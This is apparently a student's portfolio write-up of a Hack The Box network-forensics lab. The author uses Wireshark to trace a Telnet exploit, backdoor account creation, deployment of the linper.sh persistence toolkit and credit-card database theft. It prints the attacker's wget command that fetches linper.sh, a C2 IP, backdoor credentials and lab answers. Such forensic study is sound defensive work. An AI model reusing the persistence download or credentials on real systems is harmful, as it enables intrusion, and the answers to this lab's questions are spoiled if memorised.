~/portfolio / write-ups / telly
Hack The Box Network Forensics & Traffic Analysis Very Easy Apr '26

Telly

Analyzed a network capture from a compromised Linux backup server flagged for data exfiltration. Traced Telnet-based exploitation via CVE-2026-24061, followed TCP streams to map attacker activity including backdoor account creation, linper.sh persistence toolkit deployment, and exfiltration of a credit card database that was shredded by the attacker afterward.

Very Easy
Difficulty
100%
Completion
Hack The Box
Platform
TOOLS USED
Wireshark
01

Protocol Analysis & Initial Findings

let's first check the protocol hierarchy to get a feel for what we're dealing with.

Protocol hierarchy showing Telnet traffic

right away we see Telnet traffic. Telnet transmits everything in plaintext, so this is already a red flag.

Wireshark filter showing Telnet packets

filtering for Telnet, we can see that 192.168.72.136 is sending commands to 192.168.72.131. looking at the command logs, something unusual is going on.

Telnet command logs showing unusual activity

why would someone with a root user add a random account? we know right now that .131 is being infiltrated. let's follow the TCP stream to see the full picture.

02

TCP Stream Investigation

following the TCP stream, we can see passwords being read.

TCP stream showing passwords being read

and a lot of recon of directories.

TCP stream showing directory recon

continuing through the stream, the attacker downloads a file from GitHub.

TCP stream showing GitHub download of linper.sh

researching linper.sh, it is a Linux persistence toolkit from a GitHub repo called montysecurity. it automates setting up persistence mechanisms like cron jobs, SSH backdoors, and startup script modifications. the attacker then ran it.

TCP stream showing linper.sh execution

we also see the attacker found a database called credit-cards-25-blackfriday.db, exfiltrated it, and then shredded it to cover tracks.

TCP stream showing database discovery and exfiltration TCP stream showing database shredded after exfiltration
03

Exploitation Details

Q1. What CVE is associated with the vulnerability exploited in the Telnet protocol?

we know the attacker got root access on .131. looking at the command the attacker used to connect via Telnet confirms the exploit method.

Telnet exploit command used by attacker CVE article confirming CVE-2026-24061
Answer: CVE-2026-24061
Q2. When was the Telnet vulnerability successfully exploited?

the timestamp is visible in the same frame.

Wireshark packet showing exploit timestamp
Answer: 2026-01-27 10:39:28
Q3. What is the hostname of the targeted server?

visible from the TCP stream investigation earlier.

Answer: backup-secondary
Q4. What username and password were set for the backdoor account?

we saw this in the TCP stream. the attacker created an account called cleanupsvc with a password.

Answer: cleanupsvc:YouKnowWhoiam69
Q5. What was the full command the attacker used to download the persistence script?

visible in the TCP stream when we saw the attacker pull linper.sh from GitHub. since this is a simple download, wget is the tool used.

Answer: wget hxxps://raw.githubusercontent.com/montysecurity/linper/refs/heads/main/linper.sh
04

C2, Exfiltration & Data Recovery

Q6. What is the C2 IP address used for remote access persistence?

checking the traffic around when linper.sh was executed, we see outbound connections going out. that is where the attacker is sending the output of the commands.

Wireshark traffic showing C2 IP addresses after linper.sh execution
Answer: 91.99.25.54
Q7. At what time was the sensitive database file exfiltrated?

visible from the earlier TCP stream investigation.

Wireshark packet showing database exfiltration timestamp
Answer: 2026-01-27 10:49:54
Q8. Find the credit card number for a customer named Quinn Harris.

to get this, we export objects from Wireshark to recover the database file, then open it and look up Quinn Harris.

Wireshark export objects to retrieve database file Database file showing Quinn Harris credit card number
Answer: 5312269047781209
Key Takeaways
  • Telnet in a protocol hierarchy is an immediate red flag. it transmits everything in plaintext including credentials, so following the TCP stream gives you a full read of every command the attacker ran
  • check protocol hierarchy first before diving into individual packets. it gives you a quick snapshot of what's in use and helps you know where to focus
  • attackers don't always write custom tools. linper.sh is a publicly available persistence toolkit. knowing common offensive scripts like this helps you recognize them faster in the field
  • file deletion right after a suspicious transfer is a strong indicator of exfiltration. shredding is a cleanup step to remove evidence and make recovery harder
  • exporting objects from Wireshark lets you recover files transmitted over the wire, including databases the attacker exfiltrated

now that i have a process for investigating packets through Wireshark, i'm getting a solid understanding of how attacks play out across a timeline. there was less manual searching on my end and more structured filtering compared to earlier labs. good lab overall.

← Prev ItsyBitsy Next → Masquerade